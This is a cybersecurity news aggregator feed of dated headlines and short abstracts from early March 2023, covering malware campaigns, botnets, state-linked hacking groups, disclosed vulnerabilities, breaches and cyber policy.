A widespread malicious cyber operation has hijacked thousands of websites aimed at East Asian audiences to redirect visitors to adult-themed content since early September 2022. The ongoing campaign entails injecting malicious JavaScript code to the hacked websites, often connecting to the target web server using legitimate FTP credentials the threat actor previously obtained via an unknown method. "In many cases, these were highly secure auto-generated FTP credentials which the attacker was somehow able to acquire and leverage for website hijacking," Wiz said in a report published this month. The fact that the breached websites – owned by both small firms and multinational corporations – utilize different tech stacks and hosting service providers has made it difficult to trace a common attack vector, the cloud security company noted. That having said, one of the common denominators between the websites is that a majority of them are either hosted in China or hosted inThe Hacker News
March 13, 2023 – Policy and Law
Building From the 2023 National Cybersecurity Strategy: Reshaping the Terrain of Cyberspace Full Text
Abstract
If executed well, the strategy will serve as a strong pivot into a better vision for U.S. policy in cyberspace; if not, much of its promise will lack punch.Lawfare
March 13, 2023 – Botnet
Golang-Based Botnet GoBruteforcer targets web servers Full Text
Abstract
A recently discovered Golang-based botnet, dubbed GoBruteforcer, is targeting web servers running FTP, MySQL, phpMyAdmin, and Postgres services Researchers from Palo Alto Networks Unit 42 recently discovered a Golang-based botnet, tracked as GoBruteforcer,...Security Affairs
March 13, 2023 – Malware
Hackers Push BatLoader via Google Search Ads Full Text
Abstract
BATLOADER, the notorious malware loader, was seen exploiting Google Ads to deliver secondary payloads such as Vidar Stealer and Ursnif. In their ads, attackers fake legitimate apps and services such as Adobe, Tableau, ChatGPT, Spotify, and Zoom. Other samples of BATLOADER display enhanced capabilit ... Read MoreCyware
March 13, 2023 – Malware
Fake ChatGPT Chrome Extension Hijacking Facebook Accounts for Malicious Advertising Full Text
Abstract
A fake ChatGPT-branded Chrome browser extension has been found to come with capabilities to hijack Facebook accounts and create rogue admin accounts, highlighting one of the different methods cyber criminals are using to distribute malware. "By hijacking high-profile Facebook business accounts, the threat actor creates an elite army of Facebook bots and a malicious paid media apparatus," Guardio Labs researcher Nati Tal said in a technical report. "This allows it to push Facebook paid ads at the expense of its victims in a self-propagating worm-like manner." The "Quick access to Chat GPT" extension, which is said to have attracted 2,000 installations per day since March 3, 2023, has since been pulled by Google from the Chrome Web Store as of March 9, 2023. The browser add-on is promoted through Facebook-sponsored posts, and while it offers the ability to connect to the ChatGPT service, it's also engineered to surreptitiously harvest cookies andThe Hacker News
March 13, 2023 – Government
CISA adds Plex Media Server bug, exploited in LastPass attack, to Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added remote code execution vulnerability in Plex Media Server to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a remote code execution (RCE) vulnerability in the Plex Media...Security Affairs
March 13, 2023 – Hacker
China-linked Hackers Abuse SonicWall SMA Devices Full Text
Abstract
UNC4540, a China-linked cybercriminal group, was observed deploying a custom backdoor on a SonicWall SMA appliance. Attackers show a thorough understanding of the appliance and use a set of malicious files to obtain privileges. The malware is capable of extracting credentials, achieving persistence ... Read MoreCyware
March 13, 2023 – Education
How to Apply NIST Principles to SaaS in 2023 Full Text
Abstract
The National Institute of Standards and Technology (NIST) is one of the standard-bearers in global cybersecurity. The U.S.-based institute's cybersecurity framework helps organizations of all sizes understand, manage, and reduce their cyber-risk levels and better protect their data. Its importance in the fight against cyberattacks can't be overstated. While NIST hasn't directly developed standards related to securing the SaaS ecosystem, they are instrumental in the way we approach SaaS security. NIST recently released its Guide to a Secure Enterprise Network Landscape . In it, they discuss the transformation from on-premise networks to multiple cloud servers. Access to these servers, and the accompanying SaaS apps, is through both secure and unsecured devices and locations across disparate geography. The move to the cloud has effectively obliterated the network perimeter. As a result, companies have increased their attack surface and are experiencing an escalation of attacks thatThe Hacker News
March 13, 2023 – APT
Dark Pink APT targets Govt entities in South Asia Full Text
Abstract
Researchers reported that Dark Pink APT employed a malware dubbed KamiKakaBot against Southeast Asian targets. In February 2023, EclecticIQ researchers spotted multiple KamiKakaBot malware samples that were employed by the Dark Pink APT group (aka...Security Affairs
March 13, 2023 – Attack
Estonian official says parliamentary elections were targeted by cyberattacks Full Text
Abstract
Gert Auväärt, head of the National Cyber Security Centre-Estonia (NCSC-EE), told The Record that his team had been in a “heightened awareness level for two weeks” during the campaign, and that attempts to enter the electoral system were unsuccessful.Cyware
March 13, 2023 – Malware
Warning: AI-generated YouTube Video Tutorials Spreading Infostealer Malware Full Text
Abstract
Threat actors have been increasingly observed using AI-generated YouTube Videos to spread a variety of stealer malware such as Raccoon, RedLine, and Vidar. "The videos lure users by pretending to be tutorials on how to download cracked versions of software such as Photoshop, Premiere Pro, Autodesk 3ds Max, AutoCAD, and other products that are licensed products available only to paid users," CloudSEK researcher Pavan Karthick M said . Just as the ransomware landscape comprises core developers and affiliates who are in charge of identifying potential targets and actually carrying out the attacks, the information stealer ecosystem also consists of threat actors known as traffers who are recruited to spread the malware using different methods. One of the popular malware distribution channels is YouTube, with CloudSEK witnessing a 200-300% month-over-month increase in videos containing links to stealer malware in the description section. These links are often obfuscated uThe Hacker News
March 13, 2023 – General
The risk of pasting confidential company data into ChatGPT Full Text
Abstract
Experts warn that employees are providing sensitive corporate data to the popular artificial intelligence chatbot model ChatGPT. Researchers from Cyberhaven Labs analyzed the use of ChatGPT by 1.6 million workers at companies across industries. They...Security Affairs
March 13, 2023 – Breach
Zoll Medical Discloses Data Breach Impacting One Million Individuals Full Text
Abstract
Medical technology developer Zoll Medical is notifying roughly one million individuals that their personal information might have been compromised in a recent data breach.Cyware
March 13, 2023 – Vulnerabilities
Researchers Uncover Over a Dozen Security Flaws in Akuvox E11 Smart Intercom Full Text
Abstract
More than a dozen security flaws have been disclosed in E11, a smart intercom product made by Chinese company Akuvox . "The vulnerabilities could allow attackers to execute code remotely in order to activate and control the device's camera and microphone, steal video and images, or gain a network foothold," Claroty security researcher Vera Mens said in a technical write-up. Akuvox E11 is described by the company on its website as a " SIP [Session Initiation Protocol] video doorphone specially designed for villas, houses, and apartments." The product listing , however, has been taken down from the website, displaying an error message: "Page does not exist." A snapshot captured by Google shows that the page was live as recently as March 12, 2023, 05:59:51 GMT. The attacks can manifest either through remote code execution within the local area network (LAN) or remote activation of the E11's camera and microphone, allowing the adversary to cThe Hacker News
March 13, 2023 – General
The SVB demise is a fraudster’s paradise, so take precautions Full Text
Abstract
The frenzy around the SVB collapse presents a huge opportunity for cybercriminals, and it creates a cyber risk for thousands of SVB account holders, and their customers and suppliers.Cyware
March 13, 2023 – Attack
KamiKakaBot Malware Used in Latest Dark Pink APT Attacks on Southeast Asian Targets Full Text
Abstract
The Dark Pink advanced persistent threat (APT) actor has been linked to a fresh set of attacks targeting government and military entities in Southeast Asian countries with a malware called KamiKakaBot. Dark Pink, also called Saaiwc, was extensively profiled by Group-IB earlier this year, describing its use of custom tools such as TelePowerBot and KamiKakaBot to run arbitrary commands and exfiltrate sensitive information. The threat actor is suspected to be of Asia-Pacific origin and has been active since at least mid-2021, with an increased tempo observed in 2022. "The latest attacks, which took place in February 2023, were almost identical to previous attacks," Dutch cybersecurity company EclecticIQ disclosed in a new report published last week. "The main difference in the February campaign is that the malware's obfuscation routine has improved to better evade anti-malware measures." The attacks play out in the form of social engineering lures thatThe Hacker News
March 13, 2023 – General
The risk of pasting confidential company data into ChatGPT Full Text
Abstract
The use of ChatGPT is becoming a serious problem in the workspace, it can potentially cause the leak of sensitive and confidential data. Companies like JP Morgan and Verizon are blocking access to the chatbot over concerns about confidential data.Cyware
March 12, 2023 – Phishing
New Email Threats by Exotic Lily Full Text
Abstract
ReliaQuest has laid bare the detail of a phishing campaign by IAB Exotic Lily wherein its members pretend to be a potential business opportunity. The attackers follow a well-established procedure that typically commences with initiating an open conversation with the victim. ReliaQuest adv ... Read MoreCyware
March 12, 2023 – General
Security Affairs newsletter Round 410 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. PlugX...Security Affairs
March 12, 2023 – Hacker
8220 Gang Uses New ScrubCrypt Crypter to Evade Detection Full Text
Abstract
Chinese 8220 Gang deployed the new ScrubCrypt payload exploiting an Oracle Weblogic Server in a specific URI between January and February 2023, revealed security experts at Fortinet. The ScrubCrypt crypter allows a hacker to secure applications with a unique BAT packing technique. It was found to b ... Read MoreCyware
March 12, 2023 – Breach
Acronis states that only one customer’s account has been compromised. Much ado about nothing Full Text
Abstract
Acronis downplays the severity of the recent security breach explaining that only a single customer’s account was compromised. The CISO of Acronis downplayed a recent intrusion, revealing that only one customer was impacted. This week a threat...Security Affairs
March 12, 2023 – Vulnerabilities
Cisco fixed CVE-2023-20049 DoS flaw affecting enterprise routers Full Text
Abstract
Cisco fixed a high-severity DoS vulnerability (CVE-2023-20049) in IOS XR software that impacts several enterprise routers. Cisco has released security updates to address a high-severity DoS vulnerability, tracked as CVE-2023-20049 (CVSS score of 8.6),...Security Affairs
March 11, 2023 – Malware
BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads Full Text
Abstract
The malware downloader known as BATLOADER has been observed abusing Google Ads to deliver secondary payloads like Vidar Stealer and Ursnif. According to cybersecurity company eSentire , malicious ads are used to spoof a wide range of legitimate apps and services such as Adobe, OpenAPI's ChatGPT, Spotify, Tableau, and Zoom. BATLOADER , as the name suggests, is a loader that's responsible for distributing next-stage malware such as information stealers, banking malware, Cobalt Strike, and even ransomware. One of the key traits of the BATLOADER operations is the use of software impersonation tactics for malware delivery. This is achieved by setting up lookalike websites that host Windows installer files masquerading as legitimate apps to trigger the infection sequence when a user searching for the software clicks a rogue ad on the Google search results page. These MSI installer files, when launched, execute Python scripts that contain the BATLOADER payload to retrieve tThe Hacker News
March 11, 2023 – Malware
PlugX malware delivered by exploiting flaws in Chinese programs Full Text
Abstract
Researchers observed threat actors deploying PlugX malware by exploiting flaws in Chinese remote control programs Sunlogin and Awesun. Researchers at ASEC (AhnLab Security Emergency response Center) observed threat actors deploying the PlugX malware...Security Affairs
March 11, 2023 – Botnet
Prometei botnet evolves and infected +10,000 systems since November 2022 Full Text
Abstract
A new version of the Prometei botnet has infected more than 10,000 systems worldwide since November 2022, experts warn. Cisco Talos researchers reported that the Prometei botnet has infected more than 10,000 systems worldwide since November 2022....Security Affairs
March 11, 2023 – Botnet
GoBruteforcer: Golang-Based Botnet Actively Harvests Web Servers Full Text
Abstract
Go programming language is a newer language that’s becoming more popular with malware programmers. It has proven to be versatile enough to develop all kinds of malware, including ransomware, stealers or remote access trojans (RATs).Cyware
March 11, 2023 – Government
CISA adds VMware’s Cloud Foundation bug to Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added an actively exploited vulnerability in VMware's Cloud Foundation to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in VMware's Cloud Foundation,...Security Affairs
March 11, 2023 – Vulnerabilities
Unpatched Akuvox Smart Intercom Vulnerabilities Can Be Exploited for Spying Full Text
Abstract
A smart intercom product made by Chinese company Akuvox is affected by more than a dozen vulnerabilities, including potentially serious flaws that can be exploited for spying.Cyware
March 10, 2023 – Hacker
IceFire Operators Introduces Linux Variant, Abuse IBM Flaw Full Text
Abstract
Media and entertainment sector organizations worldwide are under attack by the threat actor using the Linux version of the IceFire ransomware. SentinelLabs first made this observation and found that criminals abused a deserialization bug in IBM Aspera Faspex file sharing software, tracked as CVE-20 ... Read MoreCyware
March 10, 2023 – Botnet
New Version of Prometei Botnet Infects Over 10,000 Systems Worldwide Full Text
Abstract
An updated version of a botnet malware called Prometei has infected more than 10,000 systems worldwide since November 2022. The infections are both geographically indiscriminate and opportunistic, with a majority of the victims reported in Brazil, Indonesia, and Turkey. Prometei, first observed in 2016, is a modular botnet that features a large repertoire of components and several proliferation methods, some of which also include the exploitation of ProxyLogon Microsoft Exchange Server flaws. It's also notable for avoiding striking Russia, suggesting that the threat actors behind the operation are likely based in the country. The cross-platform botnet's motivations are financial, primarily leveraging its pool of infected hosts to mine cryptocurrency and harvest credentials. The latest variant of Prometei (called v3) improves upon its existing features to challenge forensic analysis and further burrow its access on victim machines, Cisco Talos said in a report shareThe Hacker News
March 10, 2023 – Government
Department of Defense Releases Cyber Workforce Strategy, 2023–2027 Full Text
Abstract
The Cyber Workforce Strategy outlines steps to assess and enhance human capital over the next five years.Lawfare
March 10, 2023 – Criminals
Law enforcement seized the website selling the NetWire RAT and arrested a Croatian man Full Text
Abstract
An international law enforcement operation seized the infrastructure associated with the NetWire RAT and resulted in the arrest of its administrator. A coordinated international law enforcement operation resulted in the seizure of the infrastructure...Security Affairs
March 10, 2023 – Breach
Vulnerability Revealed OpenSea NFT Market Users’ Identities Full Text
Abstract
The Imperva Red Team discovered a vulnerability affecting the world’s largest NFT marketplace, OpenSea. It is a cross-site search (XS-Search) vulnerability that can be exploited by an attacker to obtain a user’s identity.Cyware
March 10, 2023 – Hacker
China-linked Hackers Targeting Unpatched SonicWall SMA Devices with Malware Full Text
Abstract
A suspecting China-linked hacking campaign has been observed targeting unpatched SonicWall Secure Mobile Access (SMA) 100 appliances to drop malware and establish long-term persistence. "The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades," cybersecurity company Mandiant said in a technical report published this week. The Google-owned incident response and threat intelligence firm is tracking the activity under its uncategorized moniker UNC4540 . The malware – a collection of bash scripts and a single ELF binary identified as a TinyShell backdoor – is engineered to grant the attacker privileged access to SonicWall devices. The overall objective behind the custom toolset appears to be credential theft, with the malware permitting the adversary to siphon cryptographically hashed credentials from all logged-in users. It further provides shell access to the compromised device. Mandiant also called out thThe Hacker News
March 10, 2023 – Malware
Latest version of Xenomorph Android malware targets 400 banks Full Text
Abstract
A new version of the Xenomorph Android malware includes a new automated transfer system framework and targets 400 banks. The author of the Xenomorph Android malware, the Hadoken Security Group, continues to improve their malicious code. In February...Security Affairs
March 10, 2023 – Government
White House Budget Seeks to Bolster US Tech Development, Modernize Standards Full Text
Abstract
The budget proposes $3.1 billion for the CISA. This includes “$98 million to implement the Cyber Incident Reporting for Critical Infrastructure Act,” as well as “$425 million to improve CISA’s internal cybersecurity and analytical capabilities.”Cyware
March 10, 2023 – Criminals
International Law Enforcement Takes Down Infamous NetWire Cross-Platform RAT Full Text
Abstract
A coordinated international law enforcement exercise has taken down the online infrastructure associated with a cross-platform remote access trojan (RAT) known as NetWire . Coinciding with the seizure of the sales website www.worldwiredlabs[.]com, a Croatian national who is suspected to be the website's administrator has been arrested. While the suspect's name was not released, investigative journalist Brian Krebs identified Mario Zanko as the owner of the domain. "NetWire is a licensed commodity RAT offered in underground forums to non-technical users to carry out their own criminal activities," Europol's European Cybercrime Center (EC3) said in a tweet. Advertised since at least 2012 , the malware is typically distributed via malspam campaigns and gives a remote attacker complete control over a Windows, macOS, or Linux system. It also comes with password-stealing and keylogging capabilities. The U.S. Department of Justice (DoJ) said an investigaThe Hacker News
March 10, 2023 – Breach<br
AT&T is notifying millions of customers of data breach after a third-party vendor hack Full Text
Abstract
AT&T is warning some of its customers that some of their information was exposed after the hack of a third-party vendor's system. AT&T is notifying millions of customers that some of their information was exposed after a third-party vendor...Security Affairs
March 10, 2023 – Breach<br
BMW exposes data of clients in Italy, experts warn Full Text
Abstract
If a malicious hacker were to discover the flaw, they could exploit it to access customer data, steal the company’s source code, and look for other vulnerabilities to exploit.Cyware
March 10, 2023 – General
When Partial Protection is Zero Protection: The MFA Blind Spots No One Talks About Full Text
Abstract
Multi-factor Authentication (MFA) has long ago become a standard security practice. With a wide consensus on its ability to fend off more than 99% percent of account takeover attacks, it's no wonder why security architects regard it as a must-have in their environments. However, what seems to be less known are the inherent coverage limitations of traditional MFA solutions. While compatible with RDP connection and local desktop logins, they offer no protection to remote command line access tools like PsExec, Remote PowerShell and their likes. In practice, it means that workstations and servers remain as vulnerable to lateral movement, ransomware spread and other identity threats despite having a fully functioning MFA solution on. For the adversary it's just a matter of taking the command line path instead of the RDP to log in as if there was not protection installed at all. In this article we'll explore this blind spot, understand its root cause and implications, and viewThe Hacker News
March 10, 2023 – Breach
BMW exposes data of clients in Italy, experts warn Full Text
Abstract
Cybernews researchers discovered that BMW exposed sensitive files that were generated by a framework that BMW Italy relies on. Original post at: https://cybernews.com/security/bmw-exposes-italy-clients/ Hackers have been enjoying their fair share...Security Affairs
March 10, 2023 – Business
Socure Secures $95 Million Credit Facility with J.P. Morgan, Silicon Valley Bank, and KeyBanc Capital Markets Full Text
Abstract
This line of credit will further strengthen the company's financial position as it continues on its mission to be the first and only solution provider to verify 100% of good identities in real-time and eliminate identity fraud on the internet.Cyware
March 10, 2023 – Malware
Xenomorph Android Banking Trojan Returns with a New and More Powerful Variant Full Text
Abstract
A new variant of the Android banking trojan named Xenomorph has surfaced in the wild, latest findings from ThreatFabric reveal. Named " Xenomorph 3rd generation " by the Hadoken Security Group, the threat actor behind the operation, the updated version comes with new features that allow it to perform financial fraud in a seamless manner. "This new version of the malware adds many new capabilities to an already feature-rich Android banker, most notably the introduction of a very extensive runtime engine powered by Accessibility services, which is used by actors to implement a complete ATS framework ," the Dutch security firm said in a report shared with The Hacker News. Xenomorph first came to light a year ago in February 2022, when it was found to target 56 European banks through dropper apps published on the Google Play Store. In contrast, the latest iteration of the banker – which has a dedicated website advertising its features – is designed to targeThe Hacker News
March 10, 2023 – Ransomware
Nevada Ransomware: Yet Another Nokayawa Variant Full Text
Abstract
Zscaler ThreatLabz has identified significant code similarities between Nevada and Nokoyawa ransomware including debug strings, command-line arguments, and encryption algorithmsCyware
March 10, 2023 – Hacker
North Korean UNC2970 Hackers Expands Operations with New Malware Families Full Text
Abstract
A North Korean espionage group tracked as UNC2970 has been observed employing previously undocumented malware families as part of a spear-phishing campaign targeting U.S. and European media and technology organizations since June 2022. Google-owned Mandiant said the threat cluster shares "multiple overlaps" with a long-running operation dubbed " Dream Job " that employs job recruitment lures in email messages to trigger the infection sequence. UNC2970 is the new moniker designated by the threat intelligence firm to a set of North Korean cyber activity that maps to UNC577 (aka Temp.Hermit ), and which also comprises another nascent threat cluster tracked as UNC4034. The UNC4034 activity, as documented by Mandiant in September 2022, entailed the use of WhatsApp to socially engineer targets into downloading a backdoor called AIRDRY.V2 under the pretext of sharing a skills assessment test. "UNC2970 has a concerted effort towards obfuscation and empThe Hacker News
March 10, 2023 – Phishing
AI is taking phishing attacks to a whole new level of sophistication Full Text
Abstract
About 92% of organizations have fallen victim to successful phishing attacks in the last 12 months, while 91% of organizations have admitted to experiencing email data loss, according to Egress.Cyware
March 9, 2023 – Malware
OneNote Used as New Distribution Channel for Qakbot Malware Full Text
Abstract
Researchers observed a notable spike in emails utilizing malicious OneNote attachments, especially to drop Qakbot or QBot. Operators have apparently reorganized its infrastructure to target specific regions and industries.Cyware
March 09, 2023 – Hacker
Hackers Exploiting Remote Desktop Software Flaws to Deploy PlugX Malware Full Text
Abstract
Security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware. AhnLab Security Emergency Response Center (ASEC), in a new analysis , said it marks the continued abuse of the flaws to deliver a variety of payloads on compromised systems. This includes the Sliver post-exploitation framework, XMRig cryptocurrency miner, Gh0st RAT, and Paradise ransomware. PlugX is the latest addition to this list. The modular malware has been extensively put to use by threat actors based in China, with new features continuously added to help perform system control and information theft. In the attacks observed by ASEC, successful exploitation of the flaws is followed by the execution of a PowerShell command that retrieves an executable and a DLL file from a remote server. This executable is a legitimate HTTP Server Service from cybersecurity company ESET, which is used to load the DLL file by means of a techniqThe Hacker News
March 9, 2023 – Denial Of Service
Akamai mitigated a record-breaking DDoS attack that peaked 900Gbps Full Text
Abstract
Akamai has mitigated the largest DDoS (distributed denial of service) attack ever, which peaked at 900.1 gigabits per second. Akamai reported that on February 23, 2023, at 10:22 UTC, it mitigated the largest DDoS attack ever. The attack...Security Affairs
March 9, 2023 – Malware
Beware! AI Generates a Truly Polymorphic Malware BlackMamba Full Text
Abstract
A BlackMamba proof-of-concept attack was demonstrated by researchers. The technology on which ChatGPT is built, the large language model (LLM), was used to create a polymorphic keylogger functionality on the fly. The malware was tested against a renowned EDR system and resulted in absolutely no ale ... Read MoreCyware
March 09, 2023 – Ransomware
IceFire Ransomware Exploits IBM Aspera Faspex to Attack Linux-Powered Enterprise Networks Full Text
Abstract
A previously known Windows-based ransomware strain known as IceFire has expanded its focus to target Linux enterprise networks belonging to several media and entertainment sector organizations across the world. The intrusions entail the exploitation of a recently disclosed deserialization vulnerability in IBM Aspera Faspex file-sharing software ( CVE-2022-47986 , CVSS score: 9.8), according to cybersecurity company SentinelOne. "This strategic shift is a significant move that aligns them with other ransomware groups that also target Linux systems," Alex Delamotte, senior threat researcher at SentinelOne, said in a report shared with The Hacker News. A majority of the attacks observed by SentinelOne have been directed against companies located in Turkey, Iran, Pakistan, and the U.A.E., countries that are not typically targeted by organized ransomware crews. IceFire was first detected in March 2022 by the MalwareHunterTeam , but it wasn't until August 2022 thaThe Hacker News
March 9, 2023 – Vulnerabilities
SonicWall SMA appliance infected by a custom malware allegedly developed by Chinese hackers Full Text
Abstract
Alleged China-linked threat actors infected unpatched SonicWall Secure Mobile Access (SMA) appliances with a custom backdoor. Mandiant researchers reported that alleged China-linked threat actors, tracked as UNC4540, deployed custom malware on a SonicWall...Security Affairs
March 9, 2023 – Hacker
Iran-linked hackers used fake Atlantic Council-affiliated persona to target human rights researchers Full Text
Abstract
It’s not clear if this particular persona’s efforts resulted in any successful phishing attacks. The Twitter account, created in October 2022, remains active. An Instagram account associated with the name is unavailable.Cyware
March 09, 2023 – General
Does Your Help Desk Know Who’s Calling? Full Text
Abstract
Phishing, the theft of users' credentials or sensitive data using social engineering, has been a significant threat since the early days of the internet – and continues to plague organizations today, accounting for more than 30% of all known breaches . And with the mass migration to remote working during the pandemic, hackers have ramped up their efforts to steal login credentials as they take advantage of the chaos and lack of in-person user verification. This has led to the revival of the old-school technique of vishing, which, like phishing online, involves using social engineering over the phone to steal sensitive information. Vishing attacks have been on the rise as a result, with 69% of companies experiencing them in 2021, up from 54% in 2020. These attacks often take the form of job or tech support scams and can be incredibly convincing. In August 2020, the FBI along with the CISA issued a warning regarding remote users being targeted by attackers spoofing organizatiThe Hacker News
March 9, 2023 – Ransomware
Recently discovered IceFire Ransomware now also targets Linux systems Full Text
Abstract
The recently discovered Windows ransomware IceFire now also targets Linux enterprise networks in multiple sectors. SentinelLabs researchers discovered new Linux versions of the recently discovered IceFire ransomware that was employed in attacks against...Security Affairs
March 9, 2023 – Criminals
Researchers Uncover Email Threats From Exotic Lily Full Text
Abstract
Exotic Lily is an initial access broker who specializes in gathering credentials from high-value targets through employee impersonation, deep open-source intelligence (OSINT), and by creating convincing malicious documents.Cyware
March 09, 2023 – Hacker
Iranian Hackers Target Women Involved in Human Rights and Middle East Politics Full Text
Abstract
Iranian state-sponsored actors are continuing to engage in social engineering campaigns targeting researchers by impersonating a U.S. think tank. "Notably the targets in this instance were all women who are actively involved in political affairs and human rights in the Middle East region," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The cybersecurity company attributed the activity to a hacking group it tracks as Cobalt Illusion , and which is also known by the names APT35, Charming Kitten, ITG18, Phosphorus, TA453, and Yellow Garuda. The targeting of academics, activists, diplomats, journalists, politicians, and researchers by the threat actor has been well-documented over the years . The group is suspected to be operating on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC) and has exhibited a pattern of using fake personas to establish contact with individuals who are of strategic interest to the governmenThe Hacker News
March 9, 2023 – Criminals
8220 Gang used new ScrubCrypt crypter in recent cryptojacking attacks Full Text
Abstract
A threat actor tracked as 8220 Gang has been spotted using a new crypter called ScrubCrypt in cryptojacking campaigns. Fortinet researchers observed the mining group 8220 Gang using a new crypter called ScrubCrypt in cryptojacking attacks. "Between...Security Affairs
March 9, 2023 – Hacker
Russian TA499 Targets North American and European Countries Full Text
Abstract
Russia-linked TA499 threat actor has been aggressively conducting email campaigns to target high-profile European and North American government authorities and CEOs of reputable organizations. The attack begins with an email or phone call, masquerading as prominent political figures. The phone call ... Read MoreCyware
March 09, 2023 – Cryptocurrency
New ScrubCrypt Crypter Used in Cryptojacking Attacks Targeting Oracle WebLogic Full Text
Abstract
The infamous cryptocurrency miner group called 8220 Gang has been observed using a new crypter called ScrubCrypt to carry out cryptojacking operations. According to Fortinet FortiGuard Labs, the attack chain commences with successful exploitation of susceptible Oracle WebLogic servers to download a PowerShell script that contains ScrubCrypt. Crypters are a type of software that can encrypt, obfuscate, and manipulate malware with the goal of evading detection by security programs. ScrubCrypt, which is advertised for sale by its author, comes with features to bypass Windows Defender protections as well as check for the presence of debugging and virtual machine environments. "ScrubCrypt is a crypter used to secure applications with a unique BAT packing method," security researcher Cara Lin said in a technical report. "The encrypted data at the top can be split into four parts using backslash '\.'" The crypter, in the final stage, decodes and loads theThe Hacker News
March 9, 2023 – Vulnerabilities
CloudBees flaws in Jenkins server can lead to code execution Full Text
Abstract
CloudBees vulnerabilities in the Jenkins open-source automation server can be exploited to achieve code execution on targeted systems. Researchers from cloud security firm Aqua discovered a chain of two vulnerabilities in the Jenkins open-source automation...Security Affairs
March 9, 2023 – General
Threat vectors converging, increasing damage Full Text
Abstract
The threat intelligence vendor Flashpoint warned that threat actors are increasingly combining known vulnerabilities, stolen credentials, and exposed data to wreak maximum damage.Cyware
March 09, 2023 – Vulnerabilities
New Critical Flaw in FortiOS and FortiProxy Could Give Hackers Remote Access Full Text
Abstract
Fortinet has released fixes to address 15 security flaws , including one critical vulnerability impacting FortiOS and FortiProxy that could enable a threat actor to take control of affected systems. The issue, tracked as CVE-2023-25610 , is rated 9.3 out of 10 for severity and was internally discovered and reported by its security teams. "A buffer underwrite ('buffer underflow') vulnerability in FortiOS and FortiProxy administrative interface may allow a remote unauthenticated attacker to execute arbitrary code on the device and/or perform a DoS on the GUI, via specifically crafted requests," Fortinet said in an advisory. Underflow bugs , also called buffer underruns , occur when the input data is shorter than the reserved space, causing unpredictable behavior or leakage of sensitive data from memory. Other possible consequences include memory corruption that could either be weaponized to induce a crash or execute arbitrary code. Fortinet said it's notThe Hacker News
March 9, 2023 – Breach
China-Linked UNC4540 Hackers Infect Unpatched SonicWall Appliances With Info-Stealer Full Text
Abstract
Suspected Chinese cybercriminals have zeroed in on unpatched SonicWall gateways and are infecting the devices with credential-stealing malware that persists through firmware upgrades, according to Mandiant.Cyware
March 9, 2023 – Business
Cado Security Banks $20M in Series B Funding Full Text
Abstract
The London-based company said Series B financing was led by Eurazeo, a French investment and asset management firm. Ten Eleven Ventures, a prior backer, also expanded its equity stake.Cyware
March 8, 2023 – Malware
Qakbot Strikes Again With New Delivery Method; Puts Millions of Devices at Risk Full Text
Abstract
Researchers at Trellix Advanced Research Center have detected various campaigns that use OneNote documents to distribute Qakbot and other malware such as AsyncRAT, Icedid, and XWorm.Cyware
March 08, 2023 – Vulnerabilities
Jenkins Security Alert: New Security Flaws Could Allow Code Execution Attacks Full Text
Abstract
A pair of severe security vulnerabilities have been disclosed in the Jenkins open source automation server that could lead to code execution on targeted systems. The flaws, tracked as CVE-2023-27898 and CVE-2023-27905 , impact the Jenkins server and Update Center, and have been collectively christened CorePlague by cloud security firm Aqua. All versions of Jenkins versions prior to 2.319.2 are vulnerable and exploitable. "Exploiting these vulnerabilities could allow an unauthenticated attacker to execute arbitrary code on the victim's Jenkins server, potentially leading to a complete compromise of the Jenkins server," the company said in a report shared with The Hacker News. The shortcomings are the result of how Jenkins processes plugins available from the Update Center , thereby potentially enabling a threat actor to upload a plugin with a malicious payload and trigger a cross-site scripting (XSS) attack. "Once the victim opens the ' Available PlugThe Hacker News
March 8, 2023 – Vulnerabilities
A critical flaw affects Fortinet FortiOS and FortiProxy, patch it now! Full Text
Abstract
Fortinet addressed a critical heap buffer underflow vulnerability affecting FortiOS and FortiProxy, which can lead to arbitrary code execution. Fortinet addressed a critical buffer underwrite ('buffer underflow') vulnerability, tracked as CVE-2023-25610...Security Affairs
March 8, 2023 – Hacker
Sharp Panda Targets Southeast Asian Governments Using Evolved Soul Malware Framework Full Text
Abstract
It uses spear-phishing emails for initial access, carrying malicious documents with government-themed lures. It further deploys the RoyalRoad RTF kit, allowing attackers to exploit older vulnerabilities for further infection.Cyware
March 08, 2023 – Solution
Syxsense Platform: Unified Security and Endpoint Management Full Text
Abstract
As threats grow and attack surfaces get more complex, companies continue to struggle with the multitude of tools they utilize to handle endpoint security and management. This can leave gaps in an enterprise's ability to identify devices that are accessing the network and in ensuring that those devices are compliant with security policies. These gaps are often seen in outdated spreadsheets that are used to track and manage asset inventory, configurations, vulnerabilities, and more. Ultimately, this increases organizational risk while stifling efficiency and productivity. That's why unified security and endpoint management has gained ground, as noted in Gartner's Hype Cycle for Endpoint Security, 2022 . As part of the market's need to gain a clearer, real-time picture of their devices and security posture, Syxsense launched its Enterprise platform last year to address the three key elements of endpoint management and security: vulnerabilities, patch, and compliance. AcThe Hacker News
March 8, 2023 – Vulnerabilities
Veeam warns to install patches to fix a bug in its Backup & Replication product Full Text
Abstract
Veeam addressed a high-severity vulnerability in the Backup Service that impacts Backup & Replication software. Veeam addressed a high-severity vulnerability in the Backup Service, tracked as CVE-2023-27532 (CVSS v3 score: 7.5), that impacts...Security Affairs
March 8, 2023 – Malware
SYS01 Campaign Uses Multiple Attack Evasion Tactics; Stayed Invisible for Five Months Full Text
Abstract
Morphisec researchers have been tracking this info-stealer since November 2022. This campaign uses lures and loading tactics similar to another info-stealer named S1deload, however, the final payload delivered is different.Cyware
March 08, 2023 – Criminals
Lazarus Group Exploits Zero-Day Vulnerability to Hack South Korean Financial Entity Full Text
Abstract
